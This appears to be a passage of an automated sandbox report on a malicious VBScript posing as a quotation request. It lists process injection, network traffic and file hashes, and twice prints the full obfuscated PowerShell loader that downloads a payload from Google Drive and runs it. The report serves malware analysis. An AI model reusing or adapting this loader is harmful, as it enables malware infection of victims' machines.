| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5072 wrote to memory of 2004 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5072 wrote to memory of 2004 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1676 -ip 1676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1628
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.28.171.150.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 142.250.178.3:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | 3.178.250.142.in-addr.arpa | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 105.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
memory/2004-0-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1j4t5zg1.nd5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2004-10-0x000001A7DDB60000-0x000001A7DDB82000-memory.dmp
memory/2004-11-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-12-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-14-0x00007FFE57A63000-0x00007FFE57A65000-memory.dmp
memory/2004-15-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-17-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/2004-20-0x00007FFE57A60000-0x00007FFE58521000-memory.dmp
memory/5100-21-0x0000000002C60000-0x0000000002C96000-memory.dmp
memory/5100-22-0x00000000057C0000-0x0000000005DE8000-memory.dmp
memory/5100-23-0x00000000056B0000-0x00000000056D2000-memory.dmp
memory/5100-24-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/5100-25-0x0000000005E60000-0x0000000005EC6000-memory.dmp
memory/5100-35-0x0000000005F50000-0x00000000062A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cb3bb854ff414cb031c64e184fd44781 |
| SHA1 | f53d30f0585d05a14f7dd82f2d0997ab44b02d62 |
| SHA256 | 42a5d533e9f3aa3407b26bd46789cd5b5f5eb580a51e64ced44c4e34c9c49896 |
| SHA512 | 9fdeb2a9b6fdd107e1ea87e646d295150fb0c8e1d1b32737cfb3fbfec9d2e595e237055676608e3474569e53b45e825b0ce28403de219cd36e48f7a3cb60e047 |
memory/5100-37-0x0000000006560000-0x000000000657E000-memory.dmp
memory/5100-38-0x00000000065B0000-0x00000000065FC000-memory.dmp
memory/5100-39-0x0000000007F00000-0x000000000857A000-memory.dmp
memory/5100-40-0x0000000006B00000-0x0000000006B1A000-memory.dmp
memory/5100-41-0x0000000007880000-0x0000000007916000-memory.dmp
memory/5100-42-0x0000000007780000-0x00000000077A2000-memory.dmp
memory/5100-43-0x0000000008580000-0x0000000008B24000-memory.dmp
C:\Users\Admin\AppData\Roaming\Symbolerne.rab
| MD5 | 4fa4bfe12534bd26a9e268a1e659e510 |
| SHA1 | f42014f4e7c0f11f4bb5f559c88310eb6db186a3 |
| SHA256 | 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0 |
| SHA512 | 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01 |
memory/5100-45-0x0000000008B30000-0x000000000DD19000-memory.dmp
memory/1676-58-0x0000000000800000-0x0000000001A54000-memory.dmp
memory/1676-59-0x0000000000800000-0x0000000001A54000-memory.dmp